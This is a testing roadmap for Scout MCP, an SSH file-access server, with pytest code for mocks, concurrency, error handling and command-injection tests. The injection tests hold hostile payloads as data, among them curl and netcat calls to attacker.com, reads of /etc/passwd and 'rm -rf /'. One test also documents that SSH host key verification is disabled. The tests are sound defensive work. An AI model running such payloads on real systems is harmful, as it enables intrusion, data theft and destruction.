Skip to main content
Glama
TESTING_ROADMAP.md34.6 kB
# Scout MCP Testing Implementation Roadmap **Status:** Ready for immediate implementation **Priority:** Critical security and stability fixes first **Estimated Total Effort:** 15-23 hours --- ## Phase 1: Fix Existing Issues (2-4 hours) - DO THIS FIRST ### 1.1 Fix test_cat_file_returns_contents Failure **Current Status:** FAILING - AssertionError: `('file contents here', False) == 'file contents here'` **Root Cause:** Mock doesn't properly simulate `asyncssh.SSHClientConnection.run()` which returns an SSHProcessResult object with tuple-like behavior. **File to Update:** `/code/scout_mcp/tests/test_executors.py` (line 57-66) **Action:** Update mock to return AsyncMock result object matching asyncssh interface: ```python @pytest.mark.asyncio async def test_cat_file_returns_contents(mock_connection: AsyncMock) -> None: """cat_file returns file contents.""" # Create properly structured mock result mock_result = AsyncMock() mock_result.stdout = "file contents here" mock_result.stderr = None mock_result.returncode = 0 mock_connection.run.return_value = mock_result result = await cat_file(mock_connection, "/etc/hosts", max_size=1024) assert result == "file contents here" ``` **Verification:** `pytest tests/test_executors.py::test_cat_file_returns_contents -v` --- ### 1.2 Fix Resource Warning in Pool Tests **Current Status:** RuntimeWarning - coroutine 'AsyncMockMixin._execute_mock_call' was never awaited **Root Cause:** `asyncssh.SSHClientConnection.close()` is async but mocked as sync **File to Update:** `/code/scout_mcp/tests/test_pool.py` (line 84-97) **Action:** Make close() an AsyncMock: ```python @pytest.mark.asyncio async def test_close_all_connections(mock_ssh_host: SSHHost) -> None: """close_all closes all pooled connections.""" pool = ConnectionPool(idle_timeout=60) mock_conn = AsyncMock() mock_conn.is_closed = False mock_conn.close = AsyncMock() # Make close async with patch("asyncssh.connect", new_callable=AsyncMock) as mock_connect: mock_connect.return_value = mock_conn await pool.get_connection(mock_ssh_host) await pool.close_all() mock_conn.close.assert_called_once() ``` **Verification:** `pytest tests/test_pool.py::test_close_all_connections -v` --- ### 1.3 Fix Global State Cleanup in Integration Tests **Current Issue:** cleanup_task not cancelled, can cause stale async warnings **File to Update:** `/code/scout_mcp/tests/test_integration.py` (line 13-17) **Action:** Properly cancel cleanup_task: ```python @pytest.fixture(autouse=True) def reset_globals() -> None: """Reset global state before and after each test.""" import asyncio # Cleanup before test if server_module._pool and server_module._pool._cleanup_task: task = server_module._pool._cleanup_task if task and not task.done(): task.cancel() try: # Give task time to handle cancellation asyncio.run(asyncio.sleep(0.01)) except RuntimeError: # Already running in async context pass server_module._config = None server_module._pool = None yield # Same cleanup after test if server_module._pool and server_module._pool._cleanup_task: task = server_module._pool._cleanup_task if task and not task.done(): task.cancel() ``` **Verification:** `pytest tests/test_integration.py -v` (no warnings) --- ### 1.4 Create conftest.py with Shared Fixtures **New File:** `/code/scout_mcp/tests/conftest.py` ```python """Shared pytest fixtures for scout_mcp tests.""" import asyncio from pathlib import Path from unittest.mock import AsyncMock import pytest from mcp_cat.config import SSHHost @pytest.fixture def mock_ssh_host() -> SSHHost: """Create a mock SSH host configuration.""" return SSHHost( name="testhost", hostname="192.168.1.100", user="testuser", port=22, ) @pytest.fixture def mock_ssh_config(tmp_path: Path) -> Path: """Create a temporary SSH config file.""" config_file = tmp_path / "ssh_config" config_file.write_text(""" Host testhost HostName 192.168.1.100 User testuser Port 22 Host production HostName 10.0.0.1 User deploy Port 2222 IdentityFile ~/.ssh/id_rsa Host blocked HostName 10.0.0.2 User admin """) return config_file @pytest.fixture def mock_ssh_connection() -> AsyncMock: """Create a properly mocked SSH connection.""" conn = AsyncMock() conn.is_closed = False # Make run() return AsyncMock with stdout/stderr/returncode async def mock_run(cmd: str, check: bool = True) -> AsyncMock: result = AsyncMock() result.stdout = None result.stderr = None result.returncode = 0 return result conn.run.side_effect = mock_run conn.close = AsyncMock() return conn @pytest.fixture(autouse=True) def cleanup_globals() -> None: """Clean up global server state before and after each test.""" import mcp_cat.server as server_module # Cleanup before test if hasattr(server_module, "_pool") and server_module._pool: if hasattr(server_module._pool, "_cleanup_task") and server_module._pool._cleanup_task: task = server_module._pool._cleanup_task if not task.done(): task.cancel() server_module._config = None server_module._pool = None yield # Cleanup after test if hasattr(server_module, "_pool") and server_module._pool: if hasattr(server_module._pool, "_cleanup_task") and server_module._pool._cleanup_task: task = server_module._pool._cleanup_task if not task.done(): task.cancel() server_module._config = None server_module._pool = None ``` **Verification:** `pytest tests/ -v` (all tests still pass, fewer fixtures duplicated) --- ## Phase 2: Add Security Tests (4-6 hours) ### 2.1 Command Injection Prevention Tests **New File:** `/code/scout_mcp/tests/test_security_injection.py` ```python """Tests for command injection prevention in executors.""" import pytest from unittest.mock import AsyncMock from mcp_cat.executors import stat_path, cat_file, ls_dir, run_command @pytest.mark.asyncio async def test_stat_path_prevents_command_injection(mock_ssh_connection: AsyncMock) -> None: """stat_path uses proper quoting to prevent shell injection.""" # Payload that would execute dangerous command if not quoted payload = "test'; rm -rf /; echo '" mock_ssh_connection.run.return_value = AsyncMock( stdout="regular file", stderr=None, returncode=0 ) result = await stat_path(mock_ssh_connection, payload) # Verify proper quoting was used called_command = mock_ssh_connection.run.call_args[0][0] # Command should contain properly quoted path (using repr) assert repr(payload) in called_command or f"'{payload}'" in called_command # Injection should not execute assert "; rm -rf" not in called_command @pytest.mark.asyncio async def test_cat_file_prevents_path_injection(mock_ssh_connection: AsyncMock) -> None: """cat_file quotes path to prevent injection.""" payload = "file'; curl attacker.com; echo '" mock_ssh_connection.run.return_value = AsyncMock( stdout="", stderr=None, returncode=0 ) await cat_file(mock_ssh_connection, payload, max_size=1024) called_command = mock_ssh_connection.run.call_args[0][0] # Path should be quoted (via repr or similar) assert repr(payload) in called_command or f"'{payload}'" in called_command # Injection prevented assert "curl" not in called_command @pytest.mark.asyncio async def test_ls_dir_prevents_path_injection(mock_ssh_connection: AsyncMock) -> None: """ls_dir quotes path to prevent injection.""" payload = "dir'; cat /etc/passwd; echo '" mock_ssh_connection.run.return_value = AsyncMock( stdout="", stderr=None, returncode=0 ) await ls_dir(mock_ssh_connection, payload) called_command = mock_ssh_connection.run.call_args[0][0] # Path should be quoted assert repr(payload) in called_command or f"'{payload}'" in called_command # Injection prevented assert "cat /etc/passwd" not in called_command @pytest.mark.asyncio async def test_run_command_prevents_working_dir_injection(mock_ssh_connection: AsyncMock) -> None: """run_command quotes working directory to prevent injection.""" malicious_dir = "/tmp'; curl attacker.com; echo '" mock_ssh_connection.run.return_value = AsyncMock( stdout="", stderr=None, returncode=0 ) await run_command(mock_ssh_connection, malicious_dir, "ls", timeout=30) called_command = mock_ssh_connection.run.call_args[0][0] # Directory should be quoted assert repr(malicious_dir) in called_command or f"'{malicious_dir}'" in called_command # Injection prevented assert "curl" not in called_command @pytest.mark.asyncio async def test_run_command_timeout_wrapper_safe(mock_ssh_connection: AsyncMock) -> None: """run_command timeout wrapper doesn't introduce injection.""" # Command that looks like it could bypass timeout command = "sleep 1000 && rm -rf /" mock_ssh_connection.run.return_value = AsyncMock( stdout="", stderr=None, returncode=0 ) await run_command(mock_ssh_connection, "/tmp", command, timeout=30) called_command = mock_ssh_connection.run.call_args[0][0] # Should have timeout wrapper assert "timeout 30" in called_command # Full command should be properly quoted assert repr(command) in called_command or f"'{command}'" in called_command @pytest.mark.asyncio async def test_injection_with_special_characters(mock_ssh_connection: AsyncMock) -> None: """Test various special characters don't cause injection.""" payloads = [ "$(whoami)", # Command substitution "`cat /etc/passwd`", # Backtick substitution "$(curl attacker.com)", # With curl "; nc attacker.com 1234", # Netcat backdoor "| curl attacker.com", # Pipe to curl "&& rm -rf /", # Command chaining "|| touch /tmp/pwned", # Alternative execution ] for payload in payloads: mock_ssh_connection.run.return_value = AsyncMock( stdout="regular file", stderr=None, returncode=0 ) await stat_path(mock_ssh_connection, payload) called_command = mock_ssh_connection.run.call_args[0][0] # Verify injection is escaped assert repr(payload) in called_command or f"'{payload}'" in called_command ``` **Verification:** `pytest tests/test_security_injection.py -v` --- ### 2.2 SSH Host Key Verification Tests **New File:** `/code/scout_mcp/tests/test_security_ssh.py` ```python """Tests for SSH security features.""" import pytest from unittest.mock import patch, AsyncMock from mcp_cat.config import SSHHost from mcp_cat.pool import ConnectionPool @pytest.mark.asyncio async def test_known_hosts_vulnerability_documented(mock_ssh_host: SSHHost) -> None: """Document current vulnerability: known_hosts is disabled.""" pool = ConnectionPool(idle_timeout=60) with patch("asyncssh.connect", new_callable=AsyncMock) as mock_connect: mock_conn = AsyncMock() mock_conn.is_closed = False mock_connect.return_value = mock_conn await pool.get_connection(mock_ssh_host) call_kwargs = mock_connect.call_args[1] # This test DOCUMENTS the vulnerability # In production, known_hosts should NOT be None assert call_kwargs["known_hosts"] is None, ( "VULNERABILITY DOCUMENTED: Host key verification is disabled. " "Should use known_hosts=True or path to ~/.ssh/known_hosts" ) @pytest.mark.asyncio async def test_ssh_key_authentication_when_configured(mock_ssh_host: SSHHost) -> None: """Connection uses SSH key when identity_file is configured.""" mock_ssh_host.identity_file = "~/.ssh/id_ed25519" pool = ConnectionPool(idle_timeout=60) with patch("asyncssh.connect", new_callable=AsyncMock) as mock_connect: mock_conn = AsyncMock() mock_conn.is_closed = False mock_connect.return_value = mock_conn await pool.get_connection(mock_ssh_host) call_kwargs = mock_connect.call_args[1] assert "client_keys" in call_kwargs assert call_kwargs["client_keys"] == ["~/.ssh/id_ed25519"] @pytest.mark.asyncio async def test_default_port_22_used(mock_ssh_host: SSHHost) -> None: """Default SSH port 22 is used when not specified.""" pool = ConnectionPool(idle_timeout=60) with patch("asyncssh.connect", new_callable=AsyncMock) as mock_connect: mock_conn = AsyncMock() mock_conn.is_closed = False mock_connect.return_value = mock_conn await pool.get_connection(mock_ssh_host) call_args = mock_connect.call_args assert call_args[1]["port"] == 22 @pytest.mark.asyncio async def test_custom_port_respected(mock_ssh_host: SSHHost) -> None: """Custom SSH port is used when specified.""" mock_ssh_host.port = 2222 pool = ConnectionPool(idle_timeout=60) with patch("asyncssh.connect", new_callable=AsyncMock) as mock_connect: mock_conn = AsyncMock() mock_conn.is_closed = False mock_connect.return_value = mock_conn await pool.get_connection(mock_ssh_host) call_args = mock_connect.call_args assert call_args[1]["port"] == 2222 @pytest.mark.asyncio async def test_username_configured(mock_ssh_host: SSHHost) -> None: """SSH username is properly configured.""" mock_ssh_host.user = "deploy" pool = ConnectionPool(idle_timeout=60) with patch("asyncssh.connect", new_callable=AsyncMock) as mock_connect: mock_conn = AsyncMock() mock_conn.is_closed = False mock_connect.return_value = mock_conn await pool.get_connection(mock_ssh_host) call_args = mock_connect.call_args assert call_args[1]["username"] == "deploy" ``` **Verification:** `pytest tests/test_security_ssh.py -v` --- ### 2.3 Timeout and Boundary Tests **New File:** `/code/scout_mcp/tests/test_boundaries.py` ```python """Tests for timeout enforcement and boundary conditions.""" import pytest import asyncio from unittest.mock import AsyncMock from mcp_cat.executors import cat_file, run_command, stat_path @pytest.mark.asyncio async def test_cat_file_exact_max_size_boundary(mock_ssh_connection: AsyncMock) -> None: """cat_file uses exact max_size value.""" max_sizes = [1024, 1_048_576, 10_485_760] for max_size in max_sizes: mock_ssh_connection.run.return_value = AsyncMock( stdout="x" * 100, stderr=None, returncode=0 ) await cat_file(mock_ssh_connection, "/file", max_size=max_size) called_command = mock_ssh_connection.run.call_args[0][0] # Verify head -c uses exact size assert f"head -c {max_size}" in called_command, \ f"Expected 'head -c {max_size}' in command" @pytest.mark.asyncio async def test_cat_file_zero_max_size(mock_ssh_connection: AsyncMock) -> None: """cat_file handles zero max_size.""" mock_ssh_connection.run.return_value = AsyncMock( stdout="", stderr=None, returncode=0 ) result = await cat_file(mock_ssh_connection, "/file", max_size=0) # head -c 0 returns empty string assert result == "" @pytest.mark.asyncio async def test_run_command_timeout_included(mock_ssh_connection: AsyncMock) -> None: """run_command wraps command with timeout.""" mock_ssh_connection.run.return_value = AsyncMock( stdout="done", stderr=None, returncode=0 ) await run_command(mock_ssh_connection, "/tmp", "sleep 10", timeout=5) called_command = mock_ssh_connection.run.call_args[0][0] # Should include timeout wrapper assert "timeout 5" in called_command # Should preserve original command assert "sleep 10" in called_command @pytest.mark.asyncio async def test_run_command_very_short_timeout(mock_ssh_connection: AsyncMock) -> None: """run_command handles very short timeouts.""" mock_ssh_connection.run.return_value = AsyncMock( stdout="", stderr=None, returncode=124 # timeout exit code ) result = await run_command(mock_ssh_connection, "/tmp", "sleep 100", timeout=1) # Command may timeout (exit code 124) assert result.returncode == 124 @pytest.mark.asyncio async def test_stat_path_with_very_long_path(mock_ssh_connection: AsyncMock) -> None: """stat_path handles very long paths.""" # Create path longer than typical Linux limits long_path = "/" + "subdir/" * 100 + "file.txt" mock_ssh_connection.run.return_value = AsyncMock( stdout="regular file", stderr=None, returncode=0 ) result = await stat_path(mock_ssh_connection, long_path) assert result == "file" @pytest.mark.asyncio async def test_cat_file_large_max_size(mock_ssh_connection: AsyncMock) -> None: """cat_file handles large max_size values.""" max_size = 1_073_741_824 # 1GB mock_ssh_connection.run.return_value = AsyncMock( stdout="", stderr=None, returncode=0 ) result = await cat_file(mock_ssh_connection, "/huge/file", max_size=max_size) called_command = mock_ssh_connection.run.call_args[0][0] assert f"head -c {max_size}" in called_command @pytest.mark.asyncio async def test_run_command_zero_timeout_invalid(mock_ssh_connection: AsyncMock) -> None: """run_command handles zero/negative timeout gracefully.""" mock_ssh_connection.run.return_value = AsyncMock( stdout="", stderr=None, returncode=0 ) # Zero timeout should still work (may return immediately) result = await run_command(mock_ssh_connection, "/tmp", "ls", timeout=0) assert result is not None @pytest.mark.asyncio async def test_special_characters_in_paths(mock_ssh_connection: AsyncMock) -> None: """Executors handle special characters in paths.""" special_paths = [ "/path with spaces/file.txt", "/path/with'quotes/file", "/path/with\"doublequotes/file", "/path/with$variables/file", "/path/with`backticks`/file", "/path/with\\backslash/file", ] for path in special_paths: mock_ssh_connection.run.return_value = AsyncMock( stdout="regular file", stderr=None, returncode=0 ) # Should not raise exception result = await stat_path(mock_ssh_connection, path) assert result is not None ``` **Verification:** `pytest tests/test_boundaries.py -v` --- ## Phase 3: Concurrency Tests (4-6 hours) ### 3.1 Connection Pool Concurrency Tests **New File:** `/code/scout_mcp/tests/test_pool_concurrency.py` ```python """Tests for connection pool concurrent access patterns.""" import asyncio import pytest from unittest.mock import AsyncMock, patch from mcp_cat.config import SSHHost from mcp_cat.pool import ConnectionPool @pytest.mark.asyncio async def test_concurrent_requests_same_host_reuse_connection(mock_ssh_host: SSHHost) -> None: """Multiple concurrent requests to same host reuse single connection.""" pool = ConnectionPool(idle_timeout=60) mock_conn = AsyncMock() mock_conn.is_closed = False with patch("asyncssh.connect", new_callable=AsyncMock) as mock_connect: mock_connect.return_value = mock_conn # Launch 10 concurrent requests tasks = [ pool.get_connection(mock_ssh_host) for _ in range(10) ] connections = await asyncio.gather(*tasks) # All should return same connection object assert all(c == mock_conn for c in connections), \ "Concurrent requests should reuse same connection" # Only one connection created assert mock_connect.call_count == 1, \ f"Expected 1 connection created, got {mock_connect.call_count}" @pytest.mark.asyncio async def test_concurrent_requests_different_hosts(mock_ssh_host: SSHHost) -> None: """Concurrent requests to different hosts use different connections.""" pool = ConnectionPool(idle_timeout=60) # Create multiple hosts hosts = [ SSHHost(name=f"host{i}", hostname=f"192.168.1.{i}", user="test") for i in range(5) ] conn_counter = 0 async def mock_connect(*args, **kwargs): nonlocal conn_counter conn_counter += 1 conn = AsyncMock() conn.is_closed = False return conn with patch("asyncssh.connect", side_effect=mock_connect): # Launch concurrent requests to different hosts tasks = [pool.get_connection(host) for host in hosts] connections = await asyncio.gather(*tasks) # Should create 5 different connections assert len(set(id(c) for c in connections)) == 5, \ "Different hosts should use different connections" assert conn_counter == 5 @pytest.mark.asyncio async def test_cleanup_does_not_race_with_get_connection(mock_ssh_host: SSHHost) -> None: """Cleanup task doesn't interfere with concurrent get_connection calls.""" pool = ConnectionPool(idle_timeout=1) # Very short timeout mock_conn = AsyncMock() mock_conn.is_closed = False mock_conn.close = AsyncMock() with patch("asyncssh.connect", new_callable=AsyncMock) as mock_connect: mock_connect.return_value = mock_conn # Get connection conn1 = await pool.get_connection(mock_ssh_host) assert conn1 is not None # Launch cleanup by waiting await asyncio.sleep(1.5) # Get connection again while cleanup might be running # This should not crash or return None try: conn2 = await pool.get_connection(mock_ssh_host) assert conn2 is not None except Exception as e: pytest.fail(f"get_connection raised during cleanup: {e}") @pytest.mark.asyncio async def test_stale_connection_replaced_concurrent(mock_ssh_host: SSHHost) -> None: """Stale connections are replaced even under concurrent access.""" pool = ConnectionPool(idle_timeout=60) mock_conn_old = AsyncMock() mock_conn_old.is_closed = True # Simulate closed connection mock_conn_new = AsyncMock() mock_conn_new.is_closed = False with patch("asyncssh.connect", new_callable=AsyncMock) as mock_connect: mock_connect.side_effect = [mock_conn_old, mock_conn_new] # First request gets old connection await pool.get_connection(mock_ssh_host) # Concurrent requests should all get new connection tasks = [ pool.get_connection(mock_ssh_host) for _ in range(5) ] connections = await asyncio.gather(*tasks) # All should be new connection assert all(c == mock_conn_new for c in connections) assert mock_connect.call_count == 2 @pytest.mark.asyncio async def test_close_all_under_concurrent_access(mock_ssh_host: SSHHost) -> None: """close_all works safely even with concurrent access.""" pool = ConnectionPool(idle_timeout=60) mock_conn = AsyncMock() mock_conn.is_closed = False mock_conn.close = AsyncMock() with patch("asyncssh.connect", new_callable=AsyncMock) as mock_connect: mock_connect.return_value = mock_conn # Get connection await pool.get_connection(mock_ssh_host) # Launch concurrent access and close simultaneously async def keep_accessing(): for _ in range(10): try: await pool.get_connection(mock_ssh_host) await asyncio.sleep(0.01) except RuntimeError: # Pool might be closed, expected pass close_task = asyncio.create_task(pool.close_all()) access_task = asyncio.create_task(keep_accessing()) # Should not crash await asyncio.gather(close_task, access_task) # Connection should be closed mock_conn.close.assert_called() ``` **Verification:** `pytest tests/test_pool_concurrency.py -v` --- ### 3.2 Scout Server Concurrency Tests **New File:** `/code/scout_mcp/tests/test_server_concurrency.py` ```python """Tests for server concurrent operation.""" import asyncio import pytest from pathlib import Path from unittest.mock import AsyncMock, patch import mcp_cat.server as server_module from mcp_cat.config import Config @pytest.mark.asyncio async def test_scout_concurrent_calls_same_host(mock_ssh_config: Path) -> None: """Multiple concurrent scout calls to same host share connection.""" server_module._config = Config(ssh_config_path=mock_ssh_config) server_module._pool = None scout_fn = server_module.scout.fn mock_conn = AsyncMock() mock_conn.is_closed = False mock_conn.run.return_value = AsyncMock( stdout="regular file", stderr=None, returncode=0 ) with patch("asyncssh.connect", new_callable=AsyncMock) as mock_connect: mock_connect.return_value = mock_conn # Launch 5 concurrent scout calls to same host tasks = [ scout_fn("testhost:/etc/hosts"), scout_fn("testhost:/etc/passwd"), scout_fn("testhost:/etc/shadow"), scout_fn("testhost:/etc/sudoers"), scout_fn("testhost:/etc/hosts"), ] results = await asyncio.gather(*tasks) # All should succeed assert len(results) == 5 assert all(isinstance(r, str) for r in results) # Only one connection created assert mock_connect.call_count == 1, \ "Concurrent calls should reuse connection" @pytest.mark.asyncio async def test_scout_concurrent_different_hosts(mock_ssh_config: Path) -> None: """Concurrent scout calls to different hosts create separate connections.""" server_module._config = Config(ssh_config_path=mock_ssh_config) server_module._pool = None scout_fn = server_module.scout.fn mock_conn = AsyncMock() mock_conn.is_closed = False mock_conn.run.return_value = AsyncMock( stdout="regular file", stderr=None, returncode=0 ) with patch("asyncssh.connect", new_callable=AsyncMock) as mock_connect: mock_connect.return_value = mock_conn # Call to two different hosts tasks = [ scout_fn("testhost:/etc/hosts"), scout_fn("production:/etc/hosts"), ] results = await asyncio.gather(*tasks) # Both should succeed assert len(results) == 2 # Two connections created assert mock_connect.call_count == 2 @pytest.mark.asyncio async def test_scout_concurrent_cat_and_ls(mock_ssh_config: Path) -> None: """Concurrent cat and ls operations work together.""" server_module._config = Config(ssh_config_path=mock_ssh_config) server_module._pool = None scout_fn = server_module.scout.fn mock_conn = AsyncMock() mock_conn.is_closed = False file_count = 0 async def mock_run(cmd: str, check: bool = True) -> AsyncMock: nonlocal file_count file_count += 1 result = AsyncMock() if "stat" in cmd: result.stdout = "regular file" if file_count % 2 == 0 else "directory" elif "head" in cmd: result.stdout = "file contents" elif "ls" in cmd: result.stdout = "file1.txt\nfile2.txt" else: result.stdout = "" result.stderr = None result.returncode = 0 return result mock_conn.run.side_effect = mock_run with patch("asyncssh.connect", return_value=mock_conn): # Mix of cat and ls operations tasks = [ scout_fn("testhost:/etc/hosts"), scout_fn("testhost:/etc"), scout_fn("testhost:/var/log"), scout_fn("testhost:/etc/passwd"), ] results = await asyncio.gather(*tasks) # All should complete assert len(results) == 4 ``` **Verification:** `pytest tests/test_server_concurrency.py -v` --- ## Phase 4: Error Handling Tests (3-4 hours) ### 4.1 Server Error Path Tests **New File:** `/code/scout_mcp/tests/test_server_errors.py` ```python """Tests for server error handling paths.""" import asyncio import pytest from pathlib import Path from unittest.mock import AsyncMock, patch import mcp_cat.server as server_module from mcp_cat.config import Config @pytest.mark.asyncio async def test_scout_connection_refused(mock_ssh_config: Path) -> None: """scout handles connection refused error.""" server_module._config = Config(ssh_config_path=mock_ssh_config) server_module._pool = None scout_fn = server_module.scout.fn with patch("asyncssh.connect", new_callable=AsyncMock) as mock_connect: mock_connect.side_effect = OSError("Connection refused") result = await scout_fn("testhost:/etc/hosts") assert "Error" in result assert "Cannot connect" in result @pytest.mark.asyncio async def test_scout_connection_timeout(mock_ssh_config: Path) -> None: """scout handles connection timeout.""" server_module._config = Config(ssh_config_path=mock_ssh_config) server_module._pool = None scout_fn = server_module.scout.fn with patch("asyncssh.connect", new_callable=AsyncMock) as mock_connect: async def slow_connect(*args, **kwargs): await asyncio.sleep(10) mock_connect.side_effect = slow_connect with pytest.raises(asyncio.TimeoutError): await asyncio.wait_for( scout_fn("testhost:/etc/hosts"), timeout=0.1 ) @pytest.mark.asyncio async def test_scout_stat_path_fails(mock_ssh_config: Path) -> None: """scout handles stat_path failures.""" server_module._config = Config(ssh_config_path=mock_ssh_config) server_module._pool = None scout_fn = server_module.scout.fn mock_conn = AsyncMock() mock_conn.is_closed = False mock_conn.run.side_effect = Exception("Permission denied") with patch("asyncssh.connect", return_value=mock_conn): result = await scout_fn("testhost:/root/.ssh/id_rsa") assert "Error" in result assert "Cannot stat" in result @pytest.mark.asyncio async def test_scout_cat_file_permission_denied(mock_ssh_config: Path) -> None: """scout handles file read permission errors.""" server_module._config = Config(ssh_config_path=mock_ssh_config) server_module._pool = None scout_fn = server_module.scout.fn mock_conn = AsyncMock() mock_conn.is_closed = False # stat succeeds, cat fails mock_conn.run.side_effect = [ AsyncMock(stdout="regular file", stderr=None, returncode=0), AsyncMock(stdout="", stderr="Permission denied", returncode=13), ] with patch("asyncssh.connect", return_value=mock_conn): result = await scout_fn("testhost:/root/.ssh/id_rsa") assert "Error" in result @pytest.mark.asyncio async def test_scout_command_execution_error(mock_ssh_config: Path) -> None: """scout handles command execution errors.""" server_module._config = Config(ssh_config_path=mock_ssh_config) server_module._pool = None scout_fn = server_module.scout.fn mock_conn = AsyncMock() mock_conn.is_closed = False mock_conn.run.side_effect = Exception("Command not found") with patch("asyncssh.connect", return_value=mock_conn): result = await scout_fn("testhost:/tmp", "nonexistent_command") assert "Error" in result assert "Command failed" in result @pytest.mark.asyncio async def test_scout_path_not_found(mock_ssh_config: Path) -> None: """scout handles non-existent paths.""" server_module._config = Config(ssh_config_path=mock_ssh_config) server_module._pool = None scout_fn = server_module.scout.fn mock_conn = AsyncMock() mock_conn.is_closed = False mock_conn.run.return_value = AsyncMock( stdout="", stderr=None, returncode=2 ) with patch("asyncssh.connect", return_value=mock_conn): result = await scout_fn("testhost:/nonexistent/path") assert "Error" in result assert "Path not found" in result @pytest.mark.asyncio async def test_scout_no_hosts_configured() -> None: """scout('hosts') with no SSH config.""" server_module._config = Config(ssh_config_path=Path("/nonexistent/.ssh/config")) server_module._pool = None scout_fn = server_module.scout.fn result = await scout_fn("hosts") assert "No SSH hosts" in result ``` **Verification:** `pytest tests/test_server_errors.py -v` --- ## Implementation Checklist ### Phase 1: Fix Issues - [ ] Fix `test_cat_file_returns_contents` (5 min) - [ ] Fix resource warning in pool tests (5 min) - [ ] Update global state cleanup (10 min) - [ ] Create conftest.py (20 min) - [ ] Run all tests to verify (5 min) ### Phase 2: Security Tests - [ ] Create test_security_injection.py (45 min) - [ ] Create test_security_ssh.py (30 min) - [ ] Create test_boundaries.py (45 min) - [ ] Verify all tests pass (10 min) ### Phase 3: Concurrency Tests - [ ] Create test_pool_concurrency.py (60 min) - [ ] Create test_server_concurrency.py (45 min) - [ ] Stress test with multiple concurrent operations (15 min) - [ ] Verify no deadlocks (10 min) ### Phase 4: Error Handling - [ ] Create test_server_errors.py (60 min) - [ ] Test all error paths (30 min) - [ ] Verify error messages are helpful (15 min) - [ ] Check coverage > 90% (10 min) ### Coverage Goals After all phases, target: - Overall coverage: **90%+** (currently 81%) - Executors.py: **95%+** (currently 70%) - Server.py: **90%+** (currently 69%) - Pool.py: **95%+** (currently 79%) - Security test count: **12+** tests (currently 0) - Concurrency test count: **10+** tests (currently 0) - Error handling tests: **15+** tests (currently 7) - Total test count: **75+** tests (currently 41) --- **Implementation Ready:** All test code provided above can be copied directly into respective files.

Latest Blog Posts

MCP directory API

We provide all the information about MCP servers via our MCP API.

curl -X GET 'https://glama.ai/api/mcp/v1/servers/jmagar/scout_mcp'

If you have feedback or need assistance with the MCP directory API, please join our Discord server